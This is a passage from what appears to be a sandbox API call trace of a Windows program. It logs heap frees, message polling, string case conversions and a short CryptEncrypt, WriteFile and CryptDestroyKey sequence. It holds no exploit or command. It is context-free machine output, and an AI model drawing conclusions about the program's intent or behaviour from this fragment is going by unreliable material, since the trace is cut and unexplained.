hHeap=0x2af0000) returned 1 [0198.863] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0198.863] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0198.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0198.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0198.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0198.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0198.863] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0198.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0198.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0198.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0198.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0198.863] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0198.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0198.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0198.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0198.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0198.864] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0198.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0198.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0198.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0198.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0198.864] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0198.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0198.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0198.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0198.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0198.864] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.864] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0198.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0198.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0198.864] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0198.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0198.864] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0198.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0198.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0198.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0198.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0198.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0198.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0198.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0198.864] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0198.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0198.865] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0198.865] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0198.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0198.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0198.865] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0198.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0198.865] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0198.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0198.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0198.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0198.865] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0198.865] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0198.865] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0198.865] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0198.865] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0198.865] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0198.865] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0198.865] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0198.865] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0198.865] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0198.865] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0198.865] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.865] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.865] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.866] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.866] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0198.866] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0198.866] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0198.866] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0198.866] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0198.866] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0198.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaab88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0198.866] CryptEncrypt (in: hKey=0x9e2078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0198.866] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.866] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.866] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.866] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.866] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0198.867] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.867] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.867] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0198.867] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0198.867] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0198.867] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0198.867] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0198.867] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0198.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaac90, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0198.867] CryptEncrypt (in: hKey=0x9e2078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a72748*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a72748*, pdwDataLen=0x8cef60*=0x8) returned 1 [0198.867] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.867] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.867] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.867] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.867] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.867] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.867] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.867] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0198.867] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0198.867] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0198.867] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0198.867] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0198.868] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0198.868] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0198.868] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0198.868] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0198.868] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0198.868] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0198.868] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0198.868] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0198.868] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0198.868] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0198.868] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0198.868] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0198.868] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0198.868] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0198.868] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.868] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0198.868] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0198.868] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0198.868] WriteFile (in: hFile=0x44c, lpBuffer=0x2a72648*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a72648*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0198.872] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0198.872] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0198.872] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0198.872] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0198.872] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0198.872] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0198.872] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0198.872] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0198.872] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0198.872] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0198.872] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0198.872] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0198.872] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0198.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa990, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0198.872] CryptDestroyKey (hKey=0x9e2078) returned 1 [0198.872] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0198.872] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0198.872] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0198.873] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0198.873] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0198.873] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0198.873] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0198.873] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0198.873] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0198.873] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0198.873] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0198.873] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0198.888] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0198.888] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0198.888] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0198.888] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0198.888] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0198.888] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0198.888] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0198.888] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0198.888] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0198.888] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0198.889] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0198.889] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0198.889] 